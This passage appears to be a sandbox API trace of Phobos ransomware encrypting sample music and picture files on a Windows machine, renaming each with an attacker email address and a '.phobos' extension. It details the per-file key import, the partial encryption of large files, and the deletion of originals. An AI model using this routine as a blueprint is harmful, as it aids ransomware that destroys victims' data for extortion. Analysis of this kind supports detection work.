music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.625] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.625] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.625] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x24a, lpOverlapped=0x0) returned 1 [0203.625] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250, dwBufLen=0x250 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250) returned 1 [0203.625] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x250, lpOverlapped=0x0) returned 1 [0203.630] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.630] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.630] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.630] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.630] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.630] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.630] CloseHandle (hObject=0x160) returned 1 [0203.630] CloseHandle (hObject=0xfc) returned 1 [0203.630] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini")) returned 1 [0203.631] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.631] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=8414449) returned 1 [0203.631] CloseHandle (hObject=0xfc) returned 1 [0203.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3")) returned 0x20 [0203.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0203.632] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.632] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0203.632] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0203.632] ReadFile (in: hFile=0xfc, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0203.811] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x2acc50, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0203.811] ReadFile (in: hFile=0xfc, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0204.146] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x7c64f1, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0204.146] ReadFile (in: hFile=0xfc, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0204.619] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa32928) returned 1 [0204.620] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0204.620] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0050) returned 1 [0204.625] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.625] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0204.625] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0102, lpOverlapped=0x0) returned 1 [0204.638] SetEndOfFile (hFile=0xfc) returned 1 [0204.639] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x7c64f1, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0204.639] WriteFile (in: hFile=0xfc, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0204.640] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x2acc50, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0204.640] WriteFile (in: hFile=0xfc, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0204.642] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0204.642] WriteFile (in: hFile=0xfc, lpBuffer=0x325013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325013a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0204.643] CloseHandle (hObject=0xfc) returned 1 [0204.643] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0204.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0204.644] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4842585) returned 1 [0204.644] CloseHandle (hObject=0xfc) returned 1 [0204.644] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3")) returned 0x20 [0204.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0204.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0204.645] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0204.645] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0204.645] ReadFile (in: hFile=0xfc, lpBuffer=0x3190058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3190058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0204.759] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x18a173, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0204.759] ReadFile (in: hFile=0xfc, lpBuffer=0x31d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x31d0058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0204.848] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x45e459, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa78 | out: lpNewFilePointer=0x0) returned 1 [0204.849] ReadFile (in: hFile=0xfc, lpBuffer=0x3210058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a0fa84, lpOverlapped=0x0 | out: lpBuffer=0x3210058*, lpNumberOfBytesRead=0x2a0fa84*=0x40000, lpOverlapped=0x0) returned 1 [0204.964] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fad4 | out: phKey=0x2a0fad4*=0xa32a28) returned 1 [0204.964] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0204.964] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa88*=0xc0060) returned 1 [0204.980] CryptDestroyKey (hKey=0xa32a28) returned 1 [0204.980] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fab0 | out: lpNewFilePointer=0x0) returned 1 [0204.980] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2a0fac0, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac0*=0xc0112, lpOverlapped=0x0) returned 1 [0205.125] SetEndOfFile (hFile=0xfc) returned 1 [0205.125] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x45e459, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0205.125] WriteFile (in: hFile=0xfc, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0205.128] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x18a173, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0205.128] WriteFile (in: hFile=0xfc, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0205.131] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0fa80 | out: lpNewFilePointer=0x0) returned 1 [0205.131] WriteFile (in: hFile=0xfc, lpBuffer=0x325014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a0fa8c, lpOverlapped=0x0 | out: lpBuffer=0x325014a*, lpNumberOfBytesWritten=0x2a0fa8c*=0x40000, lpOverlapped=0x0) returned 1 [0205.133] CloseHandle (hObject=0xfc) returned 1 [0205.133] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.153] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1120) returned 1 [0205.153] CloseHandle (hObject=0xfc) returned 1 [0205.153] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini")) returned 0x26 [0205.153] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.153] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.153] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.154] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0205.154] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.154] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x460, lpOverlapped=0x0) returned 1 [0205.223] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x470, dwBufLen=0x470 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x470) returned 1 [0205.223] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x470, lpOverlapped=0x0) returned 1 [0205.224] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a28) returned 1 [0205.224] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.224] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0205.224] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.224] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0205.224] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.224] CloseHandle (hObject=0xfc) returned 1 [0205.224] CloseHandle (hObject=0x178) returned 1 [0205.224] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini")) returned 1 [0205.225] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.226] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=595284) returned 1 [0205.226] CloseHandle (hObject=0x178) returned 1 [0205.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg")) returned 0x20 [0205.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.228] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.228] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.229] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0205.229] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.229] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91554, lpOverlapped=0x0) returned 1 [0205.317] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91560, dwBufLen=0x91560 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x91560) returned 1 [0205.377] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x91560, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x91560, lpOverlapped=0x0) returned 1 [0205.390] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32928) returned 1 [0205.390] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.390] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0205.390] CryptDestroyKey (hKey=0xa32928) returned 1 [0205.390] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0205.390] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.390] CloseHandle (hObject=0x178) returned 1 [0205.390] CloseHandle (hObject=0xfc) returned 1 [0205.390] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg")) returned 1 [0205.413] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0205.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.414] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=780831) returned 1 [0205.414] CloseHandle (hObject=0x178) returned 1 [0205.414] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg")) returned 0x20 [0205.414] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.415] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.415] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0205.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.415] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa328e8) returned 1 [0205.415] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0205.415] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xbea1f, lpOverlapped=0x0) returned 1 [0205.430] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbea20, dwBufLen=0xbea20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xbea20) returned 1 [0205.437] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xbea20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xbea20, lpOverlapped=0x0) returned 1 [0205.455] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) 